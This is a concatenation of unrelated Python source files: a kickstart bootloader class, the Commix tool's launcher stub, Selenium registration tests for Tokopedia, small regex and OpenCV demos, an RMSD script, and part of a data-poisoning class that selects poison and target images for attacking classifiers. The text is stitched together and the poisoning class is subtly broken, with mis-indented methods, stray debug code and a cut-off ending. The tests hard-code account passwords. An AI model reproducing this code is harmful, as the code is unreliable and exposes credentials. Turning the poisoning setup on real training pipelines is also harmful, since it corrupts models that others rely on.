|
#!/usr/bin/python -tt
#
# Copyright (c) 2008, 2009, 2010 Intel, Inc.
#
# Anas Nashif
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from pykickstart.base import *
from pykickstart.errors import *
from pykickstart.options import *
from pykickstart.commands.bootloader import *
class Moblin_Bootloader(F8_Bootloader):
    """Moblin kickstart 'bootloader' command: F8 bootloader plus --menus."""

    def __init__(self, writePriority=10, appendLine="", driveorder=None,
                 forceLBA=False, location="", md5pass="", password="",
                 upgrade=False, menus=""):
        F8_Bootloader.__init__(self, writePriority, appendLine, driveorder,
                               forceLBA, location, md5pass, password, upgrade)
        # BUG FIX: the menus argument was discarded (self.menus was always "").
        self.menus = menus

    def _getArgsAsStr(self):
        """Serialize back to kickstart syntax, appending --menus when set."""
        ret = F8_Bootloader._getArgsAsStr(self)
        # BUG FIX: the original condition was inverted (== ""), so --menus was
        # emitted only when menus was empty and never round-tripped a value.
        if self.menus != "":
            ret += " --menus=%s" %(self.menus,)
        return ret

    def _getParser(self):
        op = F8_Bootloader._getParser(self)
        op.add_option("--menus", dest="menus")
        return op
|
#!/usr/bin/env python2
# encoding: UTF-8
"""
This file is part of Commix Project (https://commixproject.com).
Copyright (c) 2014-2019 Anastasios Stasinopoulos (@ancst).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
# Dummy check for missing module(s): verify the package layout is importable
# and the running Python version is supported before handing off to main.
try:
    __import__("src.utils.version")
    from src.utils import version
    version.python_version()
except ImportError:
    # BUG FIX: the second assignment used "=" and silently overwrote the
    # first half of the message; concatenate instead.
    err_msg = "Wrong installation detected (missing modules). "
    err_msg += "Visit 'https://github.com/commixproject/commix/' for further details. \n"
    # NOTE(review): the original printed settings.print_critical_msg(err_msg),
    # but `settings` is never imported in this file, so the error path itself
    # raised NameError; print the plain message instead.
    print(err_msg)
    raise SystemExit()
# Main entry point: importing src.core.main runs the tool.  SystemExit and
# KeyboardInterrupt are turned into a clean exit; anything else is routed to
# the project's central unhandled-exception reporter.
if __name__ == '__main__':
    try:
        import src.core.main
    except SystemExit:
        import sys  # NOTE(review): imported but unused in this branch
        raise SystemExit()
    except KeyboardInterrupt:
        import sys  # NOTE(review): imported but unused in this branch
        raise SystemExit()
    except:
        # Deliberate bare except: every unexpected error goes through the
        # project's own crash handler instead of a raw traceback.
        from src.utils import common
        common.unhandled_exception()
# eof
|
import os,sys, time, logging
from main.page.desktop_v3.register.pe_register import RegisterPage
from main.page.desktop_v3.register.pe_facebookapi import FacebookLoginPage
from main.page.desktop_v3.register.pe_googleapi import GooglePlusLoginPage
from main.page.desktop_v3.register.pe_create_password import CreatePasswordPage
from main.page.base import BasePage
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
# All (Indonesian) error messages that can appear on the registration page.
error_list = {
    'err_fullname' : "Nama Lengkap harus diisi.",
    'err_phone' : "Nomor HP harus diisi.",
    'err_gender' : "Jenis Kelamin harus dipilih.",
    'err_birthdate' : "Tanggal Lahir tidak benar.",
    'err_email' : "Alamat Email harus diisi.",
    'err_passwd' : "Kata Sandi harus diisi.",
    'err_toc' : "Anda harus menyetujui Syarat dan Ketentuan dari Tokopedia"
}
# Facebook test account.
# NOTE(review): hard-coded test credentials checked into source — move to a
# config file or environment variables before sharing this repository.
usr_email = 'testqcmir1@gmail.com'
usr_passwd = 'ukauka'
# Google test account (placeholder values for now).
usr_email2 = 'testqcmir2@gmail.com'
usr_passwd2 = 'cumicumi'
# New Tokopedia password created during the FB/Google registration flows.
new_passwd = '12345678'
phone = '081312345678'
class registerActivity():
    """End-to-end registration flows for the desktop registration page.

    Drives RegisterPage (plus the Facebook/Google login pages) through the
    normal registration, empty-form validation and social-login scenarios.
    Progress messages printed at runtime are intentionally left in Indonesian.
    """

    _site = "live"
    # Hard-coded for now, just to check whether the flow works at all.
    fb_url = 'https://www.tokopedia.com/facebook_login.pl'

    def __init__(self, driver):
        self.driver = driver
        self.obj_reg = RegisterPage(driver)

    def set_param(self, param):
        # param: dict with keys site/name/phone/gender/prefix_email/password/inc.
        self.param = param

    def loop_reg(self, N=1):
        """Register N accounts in a row, varying the name suffix and the
        numeric counter appended to the e-mail prefix."""
        i, inc = 1, self.param['inc']
        while i <= N:
            self.obj_reg.open(self.param['site'])
            # Append a letter (b, c, ...) so every full name is unique.
            self.obj_reg.input_full_name(self.param['name'] + str(chr(97 + i)))
            self.obj_reg.input_phone_number(self.param['phone'])
            self.obj_reg.choose_gender(self.param['gender'])
            self.obj_reg.choose_birth_day(self.driver)
            self.obj_reg.choose_birth_month(self.driver)
            self.obj_reg.choose_birth_year(self.driver)
            email = self.param['prefix_email'] + str(inc) + "@gmail.com"
            self.obj_reg.input_email(email)
            self.obj_reg.input_password(self.param['password'])
            self.obj_reg.input_confirm_password(self.param['password'])
            self.obj_reg.check_tos("yes")
            self.obj_reg.submit()
            print("Done " + email)
            time.sleep(3)
            i += 1
            inc += 1

    # Normal registration.
    def test_do_register(self, driver, f_name, phone, gender_type, email_addr, password, conf_password, select_check_tos):
        """TEST #1: fill in the whole registration form and submit it."""
        print("TEST #1 : REGISTER NORMAL")
        register_page = RegisterPage(driver)
        print("Masuk halaman register")
        register_page.open(self._site)
        print("Input nama")
        register_page.input_full_name(f_name)
        print("Input nomor HP")
        register_page.input_phone_number(phone)
        print("Pilih gender")
        register_page.choose_gender(gender_type)
        print("Pilih Tanggal Lahir")
        register_page.choose_birth_day(driver)
        print("Pilih Bulan Lahir")
        register_page.choose_birth_month(driver)  # not finished yet; mirror choose_birth_day
        print("Pilih Tahun Lahir")
        register_page.choose_birth_year(driver)
        print("Input alamat e-mail")
        register_page.input_email(email_addr)
        print("Input Password")
        register_page.input_password(password)
        print("Input konfirmasi password")
        register_page.input_confirm_password(conf_password)
        print("Menyetujui terms of service")
        register_page.check_tos(select_check_tos)
        print("Klik Submit")
        register_page.submit()
        print("Selesai.")

    # added by mir
    # Action 1: submit with every field left empty.
    def check_validasi_input_null(self, driver):
        """TEST #2: submit an empty form and assert every validation message appears."""
        print("TEST #2 : REGISTER NULL")
        register_page = RegisterPage(driver)
        register_page.open(self._site)
        register_page.submit()
        print("Checking validation....")
        assert error_list['err_fullname'] in driver.find_element_by_tag_name("body").text
        print("Fullname error message validation OK")
        assert error_list['err_phone'] in driver.find_element_by_tag_name("body").text
        print("Mobile phone error message validation OK")
        assert error_list['err_gender'] in driver.find_element_by_tag_name("body").text
        print("Gender error message validation OK")
        assert error_list['err_birthdate'] in driver.find_element_by_tag_name("body").text
        print("Birthdate error message validation OK")
        assert error_list['err_email'] in driver.find_element_by_tag_name("body").text
        print("E-mail error message validation OK")
        assert error_list['err_passwd'] in driver.find_element_by_tag_name("body").text
        print("Password error message validation OK")
        assert error_list['err_toc'] in driver.find_element_by_tag_name("body").text
        print("Terms of Conduct error message validation OK")
        print("")
        print("Validation finished.")

    # Action 2: register with Facebook — FB not logged in and not yet
    # connected to Tokopedia.  FIRST TIME USE ONLY!
    def check_link_register_via_fb(self, driver):
        """TEST #3: register through the Facebook OAuth flow, then create a password."""
        register_page = RegisterPage(driver)
        register_page.open(self._site)
        print("TEST #3 : REGISTER VIA FB")
        print("Klik tombol 'Masuk dengan Facebook'")
        register_page.register_via_facebook()
        # TODO: add an assertion for the FB login page.
        print("Masuk www.tokopedia.com/facebook_login.pl (redirect ke halaman fb)")
        fb_login = FacebookLoginPage(driver)
        print("input e-mail akun fb")
        fb_login.input_email_or_hp(usr_email)
        time.sleep(1)
        print("input password akun fb")
        fb_login.input_password(usr_passwd)
        time.sleep(1)
        print("Klik tombol login")
        fb_login.login()
        # FIX: driver.switch_to_alert() was deprecated and removed in modern
        # Selenium; switch_to.alert is the supported equivalent (the returned
        # Alert handle is unused here, as before).
        driver.switch_to.alert
        print('Berhasil masuk dialog box connect apps')
        fb_login.fb_okay(driver)
        print('Berhasil connect app')
        print("Masuk halaman create_password.pl")
        create_password = CreatePasswordPage(driver)
        create_password.input_new_password(driver, new_passwd)
        create_password.confirm_new_password(driver, new_passwd)
        create_password.input_phone_number(driver, phone)
        create_password.check_tos(driver, 'yes')
        create_password.submit(driver)
        print('selesai')

    # Action 3: register with Google+ — Google not logged in and not yet
    # connected to Tokopedia.  FIRST TIME USE ONLY!
    def check_link_register_via_google(self, driver):
        """TEST #4: register through the Google+ OAuth flow, then create a password."""
        register_page = RegisterPage(driver)
        register_page.open(self._site)
        print('TEST #4 : REGISTER VIA GOOGLE+')
        register_page.register_via_google()
        print('Masuk halaman konfirmasi utk connect tokopedia & google')
        google_login = GooglePlusLoginPage(driver)
        print("input e-mail akun google")
        google_login.input_email(driver, usr_email2)
        time.sleep(1)
        print("input password akun google")
        google_login.input_password(driver, usr_passwd2)
        time.sleep(1)
        print("Klik tombol login")
        google_login.login(driver)
        # driver.switch_to.alert
        print('Masuk halaman autentikasi')
        time.sleep(3)
        google_login.click_accept(driver)
        print("Masuk halaman create_password.pl")
        time.sleep(1)
        create_password = CreatePasswordPage(driver)
        create_password.input_new_password(driver, new_passwd)
        create_password.confirm_new_password(driver, new_passwd)
        create_password.choose_birth_day(driver)
        create_password.choose_birth_month(driver)
        create_password.choose_birth_year(driver)
        create_password.input_phone_number(driver, phone)
        create_password.check_tos(driver, 'yes')
        create_password.submit(driver)
        print('Selesai')
|
import re

# If the word "ape" occurs anywhere in the text, report it.
if re.search("ape", "The ape was at the apex"):
    print("There is an ape")

# Find every occurrence of the literal substring "ape" and print each match.
allApes = re.findall("ape", "The ape was at the apex")
for i in allApes:
    print(i)

# "ape." matches "ape" followed by any single character ("ape " and "apex").
# BUG FIX: this loop iterated allApes instead of allApes2, so the dot-pattern
# matches were never printed.
allApes2 = re.findall("ape.", "The ape was at the apex")
for i in allApes2:
    print(i)
|
import numpy as np
import cv2

# OpenCV drawing demo: load an image, draw a red rectangle on it, display it,
# and close the window on any key press.
img = cv2.imread('images/watch_big.jpg',cv2.IMREAD_COLOR)
# Other drawing primitives kept (commented out) for experimentation:
#cv2.line(img,(0,0),(200,300),(255,255,255),50)
# Rectangle: top-left (500,250), bottom-right (700,300), BGR red, thickness 15.
cv2.rectangle(img,(500,250),(700,300),(0,0,255),15)
#cv2.circle(img,(447,63), 63, (0,255,0), -1)
#pts = np.array([[100,50],[200,300],[700,200],[500,100]], np.int32)
#pts = pts.reshape((-1,1,2))
#cv2.polylines(img, [pts], True, (0,255,255), 3)
#font = cv2.FONT_HERSHEY_SIMPLEX
#cv2.putText(img,'OpenCV Tuts!',(10,50), font, 2, (200,255,155), 7, cv2.CV_AA)
# Show the result and block until a key is pressed.
cv2.imshow('image',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
"""
Trajectory RMSD
"""
import argparse as ap
import sys
import pytraj as pt
import numpy as np
from scripts.md._tools import load_traj, load_ref
from typing import Optional
# Default mask for heavy-atom RMSD (no H) on ligand of name LIG
default_mask = ":LIG&!@H="


def compute_rmsd(
    itraj: str,
    itop: Optional[str] = None,
    iref: Optional[str] = None,
    lig_mask: str = default_mask,
    reimage: bool = False,
    verbose: bool = False,
) -> np.ndarray:
    """
    Compute RMSD for a trajectory with respect to a reference structure.

    Args:
        itraj (str): Trajectory file name
        itop (str, optional): Topology file name
        iref (str, optional): Reference file name
        lig_mask (str, optional): Selection mask (in `pytraj` format) for the ligand
        reimage (bool): Re-image coordinates according to PBC
        verbose (bool): Print progress messages to stdout

    Returns:
        Returns a `np.ndarray` containing the frame number and the RMSD (in angstrom)
        with respect to the reference structure `iref`.
    """
    if verbose:
        print("Loading trajectory...", file=sys.stdout, end="")
    lig_traj = load_traj(itraj, itop, mask=lig_mask)
    if verbose:
        print("done", file=sys.stdout)
    if iref is not None:
        if verbose:
            print("Loading reference...", file=sys.stdout, end="")
        lig_ref = load_ref(iref, itop, mask=lig_mask)
        if verbose:
            print("done", file=sys.stdout)
    else:
        # No reference given: fall back to the integer 0 — presumably pytraj
        # treats this as "use frame 0 as reference"; TODO confirm.
        lig_ref = 0
    # Autoimage (for PBC)
    if reimage:
        if verbose:
            print("Reimaging...", file=sys.stdout, end="")
        lig_traj = pt.autoimage(lig_traj)
        if iref is not None:
            lig_ref = pt.autoimage(lig_ref)
        if verbose:
            print("done", file=sys.stdout)
    # TODO: Align trajectory with reference structure
    # (needs to load the whole trajectory)
    # Compute RMSD (symmetrized, i.e. accounting for symmetry-equivalent atoms)
    if verbose:
        print("Computing RMSD...", file=sys.stdout, end="")
    rmsd = pt.analysis.rmsd.symmrmsd(
        lig_traj, mask=lig_mask, ref=lig_ref, ref_mask=lig_mask, fit=False
    )
    if verbose:
        print("done", file=sys.stdout)
    # TODO: Add time
    # Pair each frame index with its RMSD value: shape (n_frames, 2).
    return np.stack((np.arange(0, lig_traj.n_frames), rmsd), axis=1)
def parse(args: Optional[list] = None) -> ap.Namespace:
    """
    Parse command-line arguments.

    Args:
        args (list of str, optional): Argument tokens to parse
            (FIX: annotation corrected from ``Optional[str]`` —
            ``parse_args`` expects a sequence of tokens, not one string)

    Returns:
        An `ap.Namespace` containing the parsed options

    .. note::
        If ``args is None`` the arguments are read from ``sys.argv``
    """
    # Parser
    # BUG FIX: the description was copy-pasted from a ROC-plotting script
    # ("Plot ROC curve(s)."); describe what this tool actually does.
    parser = ap.ArgumentParser(description="Compute trajectory RMSD.")
    # Add arguments
    parser.add_argument("-x", "--traj", type=str, required=True, help="Trajectory file")
    parser.add_argument("-t", "--top", type=str, default=None, help="Topology file")
    parser.add_argument("-r", "--ref", type=str, default=None, help="Reference file")
    parser.add_argument(
        "-m",
        "--mask",
        type=str,
        default=default_mask,
        help="Atom or residue mask (pytraj format)",
    )
    parser.add_argument(
        "-o", "--output", type=str, required=True, help="RMSD output file"
    )
    parser.add_argument("--plot", action="store_true", help="Plot RMSD vs time")
    parser.add_argument(
        "--reimage", action="store_true", help="Re-image trajectory within PBC box"
    )
    parser.add_argument(
        "-v", "--verbose", action="store_true", help="Verbose execution"
    )
    # Parse arguments
    return parser.parse_args(args)
# Script entry point: validate input paths, compute the RMSD and save it.
if __name__ == "__main__":
    import os

    args = parse()
    # Fail early with a clear error if any input file is missing.
    if not os.path.isfile(args.traj):
        raise FileNotFoundError(args.traj)
    if args.top is not None and not os.path.isfile(args.top):
        raise FileNotFoundError(args.top)
    if args.ref is not None and not os.path.isfile(args.ref):
        raise FileNotFoundError(args.ref)
    # Compute RMSD ([frame, RMSD (A)])
    rmsd = compute_rmsd(
        args.traj, args.top, args.ref, args.mask, args.reimage, args.verbose
    )
    # Save RMSD to file
    np.savetxt(args.output, rmsd)
    # Plotting is declared on the CLI but not implemented yet.
    if args.plot:
        raise NotImplementedError()
|
"""Data class, holding information about dataloaders and poison ids."""
import torch
import numpy as np
import pickle
import datetime
import os
import warnings
import random
import PIL
from .datasets import construct_datasets, Subset
from .cached_dataset import CachedDataset
from .diff_data_augmentation import RandomTransform
from ..consts import PIN_MEMORY, BENCHMARK, DISTRIBUTED_BACKEND, SHARING_STRATEGY, MAX_THREADING
from ..utils import set_random_seed
# Apply module-wide torch settings from ..consts: cudnn autotuner flag and the
# tensor sharing strategy used by multiprocessing data loaders.
torch.backends.cudnn.benchmark = BENCHMARK
torch.multiprocessing.set_sharing_strategy(SHARING_STRATEGY)
class Kettle():
"""Brew poison with given arguments.
Data class.
Attributes:
- trainloader
- validloader
- poisonloader
- poison_ids
- trainset/poisonset/targetset
Most notably .poison_lookup is a dictionary that maps image ids to their slice in the poison_delta tensor.
Initializing this class will set up all necessary attributes.
Other data-related methods of this class:
- initialize_poison
- export_poison
"""
def __init__(self, args, batch_size, augmentations, setup=dict(device=torch.device('cpu'), dtype=torch.float)):
    """Initialize with given specs...

    Builds the train/valid/car datasets, optionally wraps them in LMDB or
    cached variants, chooses poison/target ids (from a benchmark file,
    deterministically from a triplet key, or randomly) and then constructs
    the corresponding DataLoaders.

    NOTE(review): the mutable default ``setup=dict(...)`` is shared across
    calls; it is only read here, but worth confirming no caller mutates it.
    """
    print("initialse with arguments")
    self.args, self.setup = args, setup
    self.batch_size = batch_size
    self.augmentations = augmentations
    # carset: additional dataset used later as the pool of target images.
    self.trainset, self.validset, self.carset = self.prepare_data(normalize=True)
    num_workers = self.get_num_workers()
    if self.args.lmdb_path is not None:
        from .lmdb_datasets import LMDBDataset  # this also depends on py-lmdb
        self.trainset = LMDBDataset(self.trainset, self.args.lmdb_path, 'train')
        self.validset = LMDBDataset(self.validset, self.args.lmdb_path, 'val')
    if self.args.cache_dataset:
        self.trainset = CachedDataset(self.trainset, num_workers=num_workers)
        self.validset = CachedDataset(self.validset, num_workers=num_workers)
        # Cached datasets serve from memory; extra workers would only add overhead.
        num_workers = 0
    if self.args.poisonkey is None:
        if self.args.benchmark != '':
            with open(self.args.benchmark, 'rb') as handle:
                setup_dict = pickle.load(handle)
            self.benchmark_construction(setup_dict[self.args.benchmark_idx])  # using the first setup dict for benchmarking
        else:
            self.random_construction()
    else:
        if '-' in self.args.poisonkey:
            # If the poisonkey contains a dash-separated triplet like 5-3-1, then poisons are drawn
            # entirely deterministically.
            self.deterministic_construction()
        else:
            # Otherwise the poisoning process is random.
            # If the poisonkey is a random integer, then this integer will be used
            # as a key to seed the random generators.
            self.random_construction()
    # Generate loaders:
    self.trainloader = torch.utils.data.DataLoader(self.trainset, batch_size=min(self.batch_size, len(self.trainset)),
                                                   shuffle=True, drop_last=False, num_workers=num_workers, pin_memory=PIN_MEMORY)
    self.validloader = torch.utils.data.DataLoader(self.validset, batch_size=min(self.batch_size, len(self.validset)),
                                                   shuffle=False, drop_last=False, num_workers=num_workers, pin_memory=PIN_MEMORY)
    # Poison batches must be non-empty even for tiny poison sets.
    validated_batch_size = max(min(args.pbatch, len(self.poisonset)), 1)
    self.poisonloader = torch.utils.data.DataLoader(self.poisonset, batch_size=validated_batch_size,
                                                    shuffle=self.args.pshuffle, drop_last=False, num_workers=num_workers,
                                                    pin_memory=PIN_MEMORY)
    # Ablation on a subset? Keep a random fraction of the training set, but
    # always force every poison id into the retained sample.
    if args.ablation < 1.0:
        self.sample = random.sample(range(len(self.trainset)), int(self.args.ablation * len(self.trainset)))
        for pidx in self.poison_ids:
            if pidx not in self.sample:
                self.sample.append(pidx.item())
        print("sample images = ", len(self.sample), self.poison_ids)
        self.partialset = Subset(self.trainset, self.sample)
        self.partialloader = torch.utils.data.DataLoader(self.partialset, batch_size=min(self.batch_size, len(self.partialset)),
                                                         shuffle=True, drop_last=False, num_workers=num_workers, pin_memory=PIN_MEMORY)
    self.print_status()
""" STATUS METHODS """
def print_status(self):
print("print status")
class_names = self.trainset.classes
if self.poison_setup["poison_class"] is not None:
print(f'--Poison images drawn from class {class_names[self.poison_setup["poison_class"]]}.')
else:
print(f'--Poison images drawn from all classes.')
print(
f'Poisoning setup generated for threat model {self.args.threatmodel} and '
f'budget of {self.args.budget * 100}% - {len(self.poisonset)} images:')
print("here", len(self.targetset))
print(self.targetset[0], self.targetset[0][0], self.targetset[0][1])
print(
f'--Target images drawn from class {", ".join([class_names[self.targetset[i][1]] for i in range(len(self.targetset))])}'
f' with ids {self.target_ids}.')
print(f'--Target images assigned intended class {", ".join([class_names[i] for i in self.poison_setup["intended_class"]])}.')
if self.args.ablation < 1.0:
print(f'--Partialset is {len(self.partialset)/len(self.trainset):2.2%} of full training set')
num_p_poisons = len(np.intersect1d(self.poison_ids.cpu().numpy(), np.array(self.sample)))
print(f'--Poisons in partialset are {num_p_poisons} ({num_p_poisons/len(self.poison_ids):2.2%})')
def get_num_workers(self):
    """Pick a DataLoader worker count from the available hardware.

    Uses up to 4 workers per GPU (4 total without CUDA), doubled thread
    count as a lower-level hint, and MAX_THREADING as a hard cap; falls
    back to 0 workers (in-process loading) on single-threaded setups.
    """
    print("get num workers")
    if torch.cuda.is_available():
        upper_bound = 4 * torch.cuda.device_count()
    else:
        upper_bound = 4
    if MAX_THREADING > 0 and torch.get_num_threads() > 1:
        worker_count = min(2 * torch.get_num_threads(), upper_bound, MAX_THREADING)
    else:
        worker_count = 0
    # worker_count = 200
    print(f'Data is loaded with {worker_count} workers.')
    return worker_count
""" CONSTRUCTION METHODS """
def prepare_data(self, normalize=True):
print("prepare dataset")
trainset, validset, carset = construct_datasets(self.args.dataset, self.args.data_path, normalize)
# Prepare data mean and std for later:
self.dm = torch.tensor(trainset.data_mean)[None, :, None, None].to(**self.setup)
self.ds = torch.tensor(trainset.data_std)[None, :, None, None].to(**self.setup)
# Train augmentations are handled separately as they possibly have to be backpropagated
if self.augmentations is not None or self.args.paugment:
if 'CIFAR' in self.args.dataset:
params = dict(source_size=32, target_size=32, shift=8, fliplr=True)
elif 'MNIST' in self.args.dataset:
params = dict(source_size=28, target_size=28, shift=4, fliplr=True)
elif 'TinyImageNet' in self.args.dataset:
params = dict(source_size=64, target_size=64, shift=64 // 4, fliplr=True)
elif 'ImageNet' in self.args.dataset:
params = dict(source_size=224, target_size=224, shift=224 // 4, fliplr=True)
if self.augmentations == 'default':
self.augment = RandomTransform(**params, mode='bilinear')
elif not self.defs.augmentations:
print('Data augmentations are disabled.')
self.augment = RandomTransform(**params, mode='bilinear')
else:
raise ValueError(f'Invalid diff. transformation given: {self.augmentations}.')
return trainset, validset, carset
def deterministic_construction(self):
    """Construct according to the triplet input key.

    The triplet key, e.g. 5-3-1 denotes in order:
    target_class - poison_class - target_id
    Poisons are always the first n occurences of the given class.
    [This is the same setup as in metapoison]
    """
    print("deterministic const")
    # Only the single-class threat model supports deterministic keys.
    if self.args.threatmodel != 'single-class':
        raise NotImplementedError()
    split = self.args.poisonkey.split('-')
    if len(split) != 3:
        raise ValueError('Invalid poison triplet supplied.')
    else:
        target_class, poison_class, target_id = [int(s) for s in split]
    # The key itself doubles as the recorded seed for reproducibility.
    self.init_seed = self.args.poisonkey
    print(f'Initializing Poison data (chosen images, examples, targets, labels) as {self.args.poisonkey}')
    self.poison_setup = dict(poison_budget=self.args.budget,
                             target_num=self.args.targets, poison_class=poison_class, target_class=target_class,
                             intended_class=[poison_class])
    self.poisonset, self.targetset, self.validset = self._choose_poisons_deterministic(target_id)
def benchmark_construction(self, setup_dict):
    """Construct according to the benchmark.

    setup_dict keys read here: 'target class', 'base class', 'base indices'
    (and 'target index' inside _choose_poisons_benchmark).
    """
    print("benchmark const")
    target_class, poison_class = setup_dict['target class'], setup_dict['base class']
    # The budget is implied by how many base indices the benchmark fixes.
    budget = len(setup_dict['base indices']) / len(self.trainset)
    self.poison_setup = dict(poison_budget=budget,
                             target_num=self.args.targets, poison_class=poison_class, target_class=target_class,
                             intended_class=[poison_class])
    self.init_seed = self.args.poisonkey
    self.poisonset, self.targetset, self.validset = self._choose_poisons_benchmark(setup_dict)
def _choose_poisons_benchmark(self, setup_dict):
    """Adopt the poison and target ids fixed by a benchmark setup dict.

    Fills self.poison_ids, self.target_ids and self.poison_lookup, and
    returns (poisonset, targetset, validset) Subsets, where validset has
    the target sample removed.
    """
    # poisons
    print("choose poisons benchmark")
    base_ids = setup_dict['base indices']
    n_poisons = len(base_ids)
    self.poison_ids = base_ids
    # the target
    self.target_ids = [setup_dict['target index']]
    # self.target_ids = setup_dict['target index']
    targetset = Subset(self.validset, indices=self.target_ids)
    # Keep every validation sample whose id is not a target id.
    valid_indices = []
    for position in range(len(self.validset)):
        _, sample_id = self.validset.get_target(position)
        if sample_id not in self.target_ids:
            valid_indices.append(sample_id)
    validset = Subset(self.validset, indices=valid_indices)
    poisonset = Subset(self.trainset, indices=self.poison_ids)
    # Construct lookup table: poison id -> slot in the poison_delta tensor.
    self.poison_lookup = {pid: slot for slot, pid in enumerate(self.poison_ids)}
    return poisonset, targetset, validset
def _choose_poisons_deterministic(self, target_id):
    """Pick poisons as the first n ids of the poison class; target by id.

    Fills self.poison_ids, self.target_ids and self.poison_lookup, and
    returns (poisonset, targetset, validset) Subsets, where validset has
    the target sample removed.
    """
    # poisons
    print("choose poisons deterministic")
    class_ids = []
    for index in range(len(self.trainset)):  # we actually iterate this way not to iterate over the images
        target, idx = self.trainset.get_target(index)
        if target == self.poison_setup['poison_class']:
            class_ids.append(idx)
    poison_num = int(np.ceil(self.args.budget * len(self.trainset)))
    if len(class_ids) < poison_num:
        # FIX: dropped the stray f-prefix — the message has no placeholders.
        warnings.warn('Training set is too small for requested poison budget.')
        poison_num = len(class_ids)
    self.poison_ids = class_ids[:poison_num]
    # the target: taken directly by validation-set id.
    # (Lookup of the target by class position is disabled for now for the
    # benchmark sanity check. This is a breaking change.)
    self.target_ids = [target_id]
    targetset = Subset(self.validset, indices=self.target_ids)
    valid_indices = []
    for index in range(len(self.validset)):
        _, idx = self.validset.get_target(index)
        if idx not in self.target_ids:
            valid_indices.append(idx)
    validset = Subset(self.validset, indices=valid_indices)
    poisonset = Subset(self.trainset, indices=self.poison_ids)
    # Construct lookup table: poison id -> slot in the poison_delta tensor.
    # FIX: removed a duplicated, dead `dict(zip(...))` expression statement
    # whose result was discarded.
    self.poison_lookup = dict(zip(self.poison_ids, range(poison_num)))
    return poisonset, targetset, validset
def random_construction(self):
    """Construct according to random selection.

    The setup can be repeated from its key (which initializes the random generator).
    This method sets
    - poison_setup
    - poisonset / targetset / validset
    """
    print("random const")
    if self.args.local_rank is None:
        # Single-process run: draw a fresh seed or reuse the given poisonkey.
        if self.args.poisonkey is None:
            self.init_seed = np.random.randint(0, 2**32 - 1)
        else:
            self.init_seed = int(self.args.poisonkey)
        set_random_seed(self.init_seed)
        print(f'Initializing Poison data (chosen images, examples, targets, labels) with random seed {self.init_seed}')
    else:
        # Distributed run: rank 0's seed is broadcast so all workers agree
        # on the same poison/target selection.
        rank = torch.distributed.get_rank()
        if self.args.poisonkey is None:
            init_seed = torch.randint(0, 2**32 - 1, [1], device=self.setup['device'])
        else:
            init_seed = torch.as_tensor(int(self.args.poisonkey), dtype=torch.int64, device=self.setup['device'])
        torch.distributed.broadcast(init_seed, src=0)
        if rank == 0:
            print(f'Initializing Poison data (chosen images, examples, targets, labels) with random seed {init_seed.item()}')
        self.init_seed = init_seed.item()
        set_random_seed(self.init_seed)
    # Parse threat model
    self.poison_setup = self._parse_threats_randomly()
    self.poisonset, self.targetset, self.validset, self.unseen_targetset = self._choose_poisons_randomly()
def _parse_threats_randomly(self):
    """Parse the different threat models.

    The threat-models are [In order of expected difficulty]:

    single-class replicates the threat model of feature collision attacks,
    third-party draws all poisons from a class that is unrelated to both target and intended label.
    random-subset draws poison images from all classes.
    random-subset-random-targets draws poison images from all classes and draws targets
    from different classes to which it assigns different labels.
    """
    print("parse threats randomly")
    num_classes = len(self.trainset.classes)
    target_class = np.random.randint(num_classes)
    list_intentions = list(range(num_classes))
    list_intentions.remove(target_class)
    #intended_class = [np.random.choice(list_intentions)] * self.args.targets
    # NOTE(review): the intended class is hard-coded to 6 (the random choice
    # above is commented out) — looks like an experiment-specific override;
    # confirm before general use.
    intended_class = [6] * self.args.targets
    if self.args.targets < 1:
        # Degenerate case: no targets requested at all.
        poison_setup = dict(poison_budget=0, target_num=0,
                            poison_class=np.random.randint(num_classes), target_class=None,
                            intended_class=[np.random.randint(num_classes)])
        warnings.warn('Number of targets set to 0.')
        return poison_setup
    if self.args.threatmodel == 'single-class':
        poison_class = intended_class[0]
        poison_setup = dict(poison_budget=self.args.budget, target_num=self.args.targets,
                            poison_class=poison_class, target_class=target_class, intended_class=intended_class)
    elif self.args.threatmodel == 'third-party':
        list_intentions.remove(intended_class[0])
        poison_class = np.random.choice(list_intentions)
        poison_setup = dict(poison_budget=self.args.budget, target_num=self.args.targets,
                            poison_class=poison_class, target_class=target_class, intended_class=intended_class)
    elif self.args.threatmodel == 'self-betrayal':
        poison_class = target_class
        poison_setup = dict(poison_budget=self.args.budget, target_num=self.args.targets,
                            poison_class=poison_class, target_class=target_class, intended_class=intended_class)
    elif self.args.threatmodel == 'random-subset':
        poison_class = None
        poison_setup = dict(poison_budget=self.args.budget,
                            target_num=self.args.targets, poison_class=None, target_class=target_class,
                            intended_class=intended_class)
    elif self.args.threatmodel == 'random-subset-random-targets':
        target_class = None
        intended_class = np.random.randint(num_classes, size=self.args.targets)
        poison_class = None
        poison_setup = dict(poison_budget=self.args.budget,
                            target_num=self.args.targets, poison_class=None, target_class=None,
                            intended_class=intended_class)
    else:
        raise NotImplementedError('Unknown threat model.')
    # NOTE(review): this uses the *variable* target_class (an int or None) as
    # the dict key — not the string 'target_class' — and the magic value 14 is
    # unexplained; likely a debugging leftover, confirm before relying on it.
    poison_setup[target_class] = 14
    print("poison, target classes = ", poison_class, target_class)
    return poison_setup
def _choose_poisons_randomly(self):
    """Subconstruct poison and targets.

    The behavior is different for poisons and targets. We still consider poisons to be part of the original training
    set and load them via trainloader (And then add the adversarial pattern Delta)
    The targets are fully removed from the validation set and returned as a separate dataset, indicating that they
    should not be considered during clean validation using the validloader

    Returns:
        (poisonset, targetset, validset, unseentargetset) Subsets; also sets
        self.poison_ids, self.target_ids, self.rem_ids and self.poison_lookup.
    """
    print("choose poisons randomly")
    # Poisons:
    if self.poison_setup['poison_class'] is not None:
        class_ids = []
